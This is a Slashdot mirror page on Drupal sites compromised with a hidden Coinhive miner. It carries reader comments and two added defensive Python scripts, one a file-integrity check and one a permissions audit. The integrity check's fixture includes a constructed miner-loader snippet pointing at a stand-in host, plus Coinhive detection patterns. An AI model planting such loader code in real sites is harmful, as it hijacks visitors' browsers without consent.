Slashdot Mirror


Drupal Sites Fall Victims To Cryptojacking Campaigns (bleepingcomputer.com)

An anonymous reader shares a report: After the publication of two severe security flaws in the Drupal CMS, cybercrime groups have turned their sights on this web technology in the hopes of finding new ground to plant malware on servers and make money through illegal cryptocurrency mining. [...] Now, as time passes by, more malware campaigns targeting Drupal sites are getting off the ground -- and two of them have been spotted the past week.

The most recent of these campaigns has been discovered by US security researcher Troy Mursch. The researcher discovered a group that gained access to Drupal sites and hid a version of the Coinhive in-browser cryptocurrency miner inside a file named "jquery [dot] once [dot] js?v=1.2," loaded on each of the compromised sites. Mursch initially tracked down the infected files to over 100,000 domains, then narrowed down the results to 80,000 domains, and finally confirmed the infection on at least 348 sites where the in-browser mining operation was actually taking place.
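
The summary says the miner was hidden inside the file served as jquery.once.js?v=1.2. A stock Drupal 7 site loads that exact script on every page, so the URL by itself tells a site owner nothing; what matters is whether the served copy still matches the copy in a clean core release. The script below is an added example for this page, not code from the article, from BleepingComputer or from Troy Mursch. It pulls the script URLs out of a saved page so the operator knows which file to fetch, compares a served copy against a reference copy by SHA-256, reports whether the difference is a tail appended after the original content, and flags strings associated with the public Coinhive loader. The reference file, the tampered file and the HTML are constructed stand-ins, and the Coinhive marker strings are an assumption, not indicators taken from the campaign.

```python
"""Integrity check for the Drupal script the article names as the hiding place
for the miner.  Added example for this thread; not code from the article, from
BleepingComputer or from Troy Mursch.

A stock Drupal 7 site loads misc/jquery.once.js?v=1.2 on every page, so the URL
alone proves nothing; the useful check is whether the served copy still matches
the copy in a clean core release.  REFERENCE_JS and TAMPERED_JS below are
constructed stand-ins, not the real file, and the marker strings are an
assumption based on the public Coinhive loader, not indicators from the campaign.
"""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

TARGET_BASENAME = "jquery.once.js"            # file name given in the article
MARKERS = (
    re.compile(r"coinhive", re.I),            # assumption: library/loader host name
    re.compile(r"CoinHive\.(Anonymous|User)\s*\("),  # assumption: public API calls
)


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def candidate_scripts(html):
    """Return script URLs whose file name is jquery.once.js, query string
    included, so the operator knows exactly which copy to fetch and compare."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    parser.close()
    return [s for s in parser.srcs
            if urlparse(s).path.rsplit("/", 1)[-1].lower() == TARGET_BASENAME]


def sha256(data):
    return hashlib.sha256(data).hexdigest()


def integrity_report(served, reference):
    """Compare a served copy of the file against the clean release copy.

    Returns the two digests, whether they match, the bytes appended after the
    reference content (the common 'tack a loader onto the end' pattern) or None
    if the change is elsewhere, and any marker patterns that hit."""
    match = served == reference
    appended = None
    if not match and served.startswith(reference):
        appended = served[len(reference):]
    text = served.decode("utf-8", errors="replace")
    hits = sorted({m.pattern for m in MARKERS if m.search(text)})
    return {
        "served_sha256": sha256(served),
        "reference_sha256": sha256(reference),
        "match": match,
        "appended_bytes": appended,
        "marker_hits": hits,
    }


# Constructed samples.  REFERENCE_JS stands in for the pristine file from a
# clean core tarball; TAMPERED_JS is the same content with a loader-like tail
# pointing at a reserved .invalid host.
REFERENCE_JS = b"(function($){$.fn.once=function(id,fn){return this;};})(jQuery);\n"
TAMPERED_JS = REFERENCE_JS + (
    b"var s=document.createElement('script');"
    b"s.src='https://cdn.invalid/coinhive.min.js';document.head.appendChild(s);"
)

SAMPLE_HTML = """<html><head>
<script src="/misc/jquery.js?v=1.4.4"></script>
<script src="/misc/jquery.once.js?v=1.2"></script>
<script src="https://static.example/js/app.js"></script>
</head><body></body></html>"""


def main():
    for src in candidate_scripts(SAMPLE_HTML):
        print("fetch and compare:", src)
    report = integrity_report(TAMPERED_JS, REFERENCE_JS)
    print("match:", report["match"], "marker hits:", report["marker_hits"])
    if report["appended_bytes"]:
        print("appended tail:", report["appended_bytes"][:80])


if __name__ == "__main__":
    main()
```

In practice the reference bytes come from the same Drupal release the site claims to run, unpacked from a fresh download rather than from the server, and the served bytes are fetched over HTTP the way a visitor's browser would receive them; the hash comparison is authoritative, the marker scan only helps triage what changed.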

27 comments

  1. You work for me now by Anonymous Coward · · Score: 1

    This is why I only use WordPress on my important sites

    1. Re:You work for me now by pahles · · Score: 4, Informative
      --
      Sig?
    2. Re:You work for me now by Anonymous Coward · · Score: 0

      It's more interesting to look at the chart comparing vulnerabilities by year. Both have had some major spikes over the years.

      https://www.cvedetails.com/pro...

      https://www.cvedetails.com/pro...

      The difference is, Drupal is guilty of being insecure over generations. The vulnerabilities being reported go back to d5, and the original commits are by people who are no longer in the community.

      Anyone running anything below d7 probably does not put much work into maintaining their website, creating this huge garden for bad elements to play in. Another thing: the update module - which ships starting with Drupal 6 - is likely turned off if you don't care about maintaining your website. Which means the Drupal team doesn't know how big a problem they have created.

      Drupal 8's architecture is integrated with Symfony, which has its own set of issues.

      https://www.cvedetails.com/pro...

      While the number of issues may seem low by comparison, they are mostly code execution vulnerabilities.

      So, there's a team of CMS developers, who have been building insecure systems for years and now have a huge set of malware sites built on their platform that no one can do much about. Despite that track record, their Core development team is being trusted with integrating a complex PHP framework known for code execution vulnerabilities.

      What's not to love about this situation?

    3. Re:You work for me now by Anonymous Coward · · Score: 0

      What's not to love about this situation?

      Yeah, but it's cheap and Americans are used to being hacked all the time now and having no privacy. As long as their competitors are no better the business doesn't care.

  2. If one goes open source PHP... by TheZeitgeist · · Score: 1

    They get what they deserve.

    1. Re: If one goes open source PHP... by Aethedor · · Score: 1

      Try this one.

      --
      It doesn't have to be like this. All we need to do is make sure we keep talking.
    2. Re: If one goes open source PHP... by Anonymous Coward · · Score: 0

      They can't even be bothered to spell/grammar check their web site. What makes you think they can write reliable, bug-free and secure code?

    3. Re: If one goes open source PHP... by Aethedor · · Score: 1

      If that's really all the criticism you can give, the Banshee developer did a good job.

      --
      It doesn't have to be like this. All we need to do is make sure we keep talking.
    4. Re: If one goes open source PHP... by Anonymous Coward · · Score: 0

      Sorry, it's not very good.

      It seems to do very little to make sure that code written on top of it is secure. Here are the sum-total of the security features I can see:

      • There's a (really bad) static analyser for SQL Injections. It can be tricked because parsing code with regexes doesn't work.
      • I *think* that it prevents XSS by virtue of its view scripting being a really verbose chain of PHP method calls (but I can't tell for sure)

      That is all. I can't see anything on the website that lists how great it is for security besides "we've audited it". That's nice and all but if there's a security bug in a framework, it'll get updated and then I'll install the update. A security bug in the code I'm responsible for? That probably won't get found by anyone except a ne'er-do-well. How does this make that more secure? How does it prevent me from triggering one of the many security footguns in (PHP) web development?

      I'd personally recommend just using Symfony or Laravel instead. People are looking at them for security vulns and they have actual features that prevent you from doing dumb things.

    5. Re: If one goes open source PHP... by Aethedor · · Score: 1

      Sorry, but this 'review' makes no sense at all. Your 'sum-total of the security features'... I have no idea what you looked at, but you clearly didn't look at Banshee. Or at least, not in a serious way.

      --
      It doesn't have to be like this. All we need to do is make sure we keep talking.
  3. SJW culture a contributing factor? by Anonymous Coward · · Score: 0

    I wonder if the talented people who can write secure software have all been turned off by all the SJW stuff that this project thrives on and hence do not want to contribute to making it secure?

  4. Hell of a file name by Anonymous Coward · · Score: 0

    inside a file named "jquery [dot] once [dot] js?v=1.2," That is one hell of a file name..

  5. Drupal needs one click updating for core. by cascadingstylesheet · · Score: 1

    Drupal needs one click updating for core.

    (Optional) autoupdating would be even better. But at least one click is a minimum these days. The manual screwing around that you have to do to update Drupal is absurd.

    (Not difficult, just absurd. It's because it isn't difficult that it's absurd that it isn't automated.)

    1. Re:Drupal needs one click updating for core. by Anonymous Coward · · Score: 0

      Nah, it's often difficult as well, because most of the touted functionality of Drupal comes from custom modules, which are often badly written - meaning updates fuck things up hardcore.

      Of course, that's what a QA environment is for, but ain't nobody want to pay for proper QA.

    2. Re:Drupal needs one click updating for core. by thaylin · · Score: 1

      And then you get updates like Confluence where you have to make backups of the conf files because it likes to blow them away.

      --
      When you can't win, ad hominem.
    3. Re:Drupal needs one click updating for core. by Anonymous Coward · · Score: 1

      I think it is immensely dangerous to have that feature. The last thing I want is for the executable and configs and everything to be writable to the process running them. That is just begging for escalation of attacks.

    4. Re:Drupal needs one click updating for core. by drinkypoo · · Score: 1

      I think it is immensely dangerous to have that feature. The last thing I want is for the executable and configs and everything to be writable to the process running them. That is just begging for escalation of attacks.

      You're totally correct, but they could have a simple script that you'd run, assuming you can do such things, that would do the job for you. Though, to be fair, it's not exactly complicated. Extract the archive and rsync it. Then you do have to run db updates, but that could be done by the update script easily enough.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
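
The two comments above pull in opposite directions: an update mechanism is convenient, but code and configuration must not be writable by the process that runs them, and a deploy script that extracts and rsyncs can easily leave a file with the wrong mode behind. The audit below is an added example for this thread, not code from Drupal or from either commenter. It walks a docroot and reports every file or directory the web-server account could modify, given that the files are owned by a separate deploy account; the only subtree it exempts is Drupal's public files directory, which it assumes lives at sites/default/files. The sample tree it builds is constructed for the demonstration and is not a real Drupal install.

```python
"""Audit a Drupal docroot for files the web-server process could modify.
Added example for this thread; not code from Drupal or from the commenters.

Assumptions: code and config are deployed by an account other than the one
the web server runs as, and the only tree that must stay writable is Drupal's
public files directory, conventionally sites/default/files.  This is the check
a deploy script would run after the rsync step and before database updates,
so a writable settings file or module directory is caught rather than left
behind.  POSIX mode bits only; ACLs are out of scope.
"""
import os
import shutil
import stat
import tempfile

WRITABLE_ALLOWLIST = ("sites/default/files",)   # assumption: Drupal's upload dir


def web_process_can_write(st, web_uid, web_gid):
    """True if a process running as web_uid/web_gid could write this inode,
    judged from ownership and the user/group/other write bits."""
    mode = st.st_mode
    if st.st_uid == web_uid:
        return bool(mode & stat.S_IWUSR)
    if st.st_gid == web_gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_docroot(docroot, web_uid, web_gid, allowlist=WRITABLE_ALLOWLIST):
    """Return sorted relative paths (files and directories) the web process
    could write, excluding allow-listed subtrees.  Writable directories are
    reported too: they let the process drop new files next to trusted code."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(docroot):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, docroot)
            if any(rel == a or rel.startswith(a + os.sep) for a in allowlist):
                continue
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):      # symlink modes are meaningless
                continue
            if web_process_can_write(st, web_uid, web_gid):
                findings.append(rel)
    return sorted(findings)


def build_demo_docroot():
    """Constructed sample tree (not a real Drupal install) for the demo."""
    root = tempfile.mkdtemp(prefix="drupal-audit-")
    layout = {
        "index.php": 0o644,                    # code, read-only to the web process
        "sites/default/settings.php": 0o666,   # config left world-writable: finding
        "sites/default/files/logo.png": 0o666, # upload dir, allowed to be writable
        "modules/custom/ok.module": 0o644,
    }
    for rel, mode in layout.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w") as fh:
            fh.write("// constructed placeholder\n")
        os.chmod(full, mode)
    # Pin directory modes explicitly so the demo does not depend on the umask.
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), 0o755)
    os.chmod(os.path.join(root, "modules", "custom"), 0o777)  # writable dir: finding
    return root


def demo_findings():
    """Run the audit against the constructed tree with web uid/gid chosen to
    differ from the deploying user, as in a real deploy/web account split."""
    root = build_demo_docroot()
    try:
        st = os.stat(root)
        return audit_docroot(root, web_uid=st.st_uid + 1, web_gid=st.st_gid + 1)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for path in demo_findings():
        print("writable by web process:", path)
```

On a real server the uid and gid come from the account the web server actually runs as (pwd.getpwnam on that account name), and a non-empty result from the audit is a reason to fail the deploy rather than a warning to read later.
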
    5. Re:Drupal needs one click updating for core. by Anonymous Coward · · Score: 0

      At that point, just set up unattended-upgrades or AutoUpdate or your distro's equivalent. Most can even be set to restart the daemons, restart the machine, and send the admin a nice email all in one, if you want the above.

  6. That's harsh by Hognoxious · · Score: 1

    On top of already being victims just by having Drupal.

    --
    Confucius say, "Find worm in apple - bad. Find half a worm - worse."
  7. Turnkey again! by duke_cheetah2003 · · Score: 1

    And we're back here again, pointing out why Turnkey solutions for internet connected servers are BAD NEWS!

    1. Re:Turnkey again! by Anonymous Coward · · Score: 0

      And we're back here again, pointing out why Turnkey solutions for internet connected servers are BAD NEWS!

      Are people supposed to each develop their own website/framework in their own corner and never share?

    2. Re:Turnkey again! by yelvington · · Score: 1

      Because it's much better to have bespoke security holes?

    3. Re:Turnkey again! by Anonymous Coward · · Score: 1

      Because it's much better to have bespoke security holes?

      Actually yes, because nobody is going to waste their time cracking the bespoke site for your small business. The returns are too low for their investment of time and they get exactly one infection out of the deal. The thing that makes turnkey content management systems attractive is precisely the large base of installed users who don't patch their installs regularly after the consultants who set it all up for them leave or have a falling out with the business owner. It's not unusual to have thousands or even tens of thousands of potential targets running Drupal, WordPress or Joomla installations that haven't been patched in 5 years or more. Suddenly a breach in one of these shake-and-bake website tools is much more attractive because of the much larger pool of potential victims. Cryptocurrency mining sweetens the pot because you don't have to find a site that's taking payments to make money. All you need are unwitting visitors to the web site whose browsers can be hijacked to mine Monero or some other crypto coins.

  8. All so-called cryptocurrencies are Ponzi Scams by Anonymous Coward · · Score: 0

    Are (any) fiat currency and (any) cryptocurrency really equivalent, as cryptocurrency fans claim?
    For example, are the US Dollar and Bitcoin really equals?
    The value/validity/authorization of the US dollar is provided/guaranteed by the US Government (and in turn the whole US Public)!
    Also, not to mention, US Dollars in any US Bank are insured by the US Government!
    What authorization/guarantee/insurance is behind Bitcoin? Nothing!
    Sorry but that is the end of discussion then!

    Why do you think Satoshi Nakamoto is really hiding his identity, if Bitcoin is really such a great innovation?
    Is he just someone who does not like media/fan attention?
    Or, could it really be because Bitcoin (and all cryptocurrencies that followed it) are actually Ponzi Schemes?
    (So he knew very well that law enforcement would come after him sooner or later?!)

    If so-called cryptocurrencies are really a good innovation, why do they attract so many criminals/criminal activity?
    Could it really be because all cryptocurrencies themselves are scams, and that is why they attract all kinds of criminals/criminal activity?

    If so-called cryptocurrencies are really currency, why can no company/store use Bitcoin as currency anymore?
    Because the price of Bitcoin proved to be extremely unstable for use as a currency?
    Would the result be different if Bitcoin were replaced by any other "cryptocurrency"?
    Don't they all work the same way?

    If so-called cryptocurrencies are really money, isn't people issuing their own money already illegal in all countries?
    If so, then why are they still not banned in all countries?

    Or are they not actually virtual currency but virtual investment?
    But if they are actually investments, why do we need/want them?
    What would happen to the world economy if people invested in virtual investments instead of real investments?

    Or are all so-called cryptocurrencies actually just modified (made decentralized and paying variable interest) Ponzi Schemes?
    (The price of cryptocurrencies would keep increasing in the long term (by their design), so it is the equivalent of paying variable interest to all long-term investors.)

    Also, since all so-called cryptocurrencies are actually financial scams (Ponzi Schemes), that means they cannot be the solution for any of the existing financial problems of our world!

    As more and more people invest in cryptocurrencies, it will become harder and harder to ban their trading everywhere (because people invested in cryptocurrencies would try to stop anyone trying to ban cryptocurrencies)!
    All cryptocurrencies need to be banned globally before it is too late!

    Fools rush in where angels fear to tread! :-)

  9. Static sites FTW by Tool+Man · · Score: 1

    If you don't leave some leaky, bug-ridden CMS on the front end of your web site, there is a lot less to exploit.
    You can probably do it with some plugin or other with Drupal, just like you can with WordPress, Django or whatever. For most people though, you could do well with a static site generator.

    If there's no exploitable hole in the base OS or web server, good luck having your way with HTML.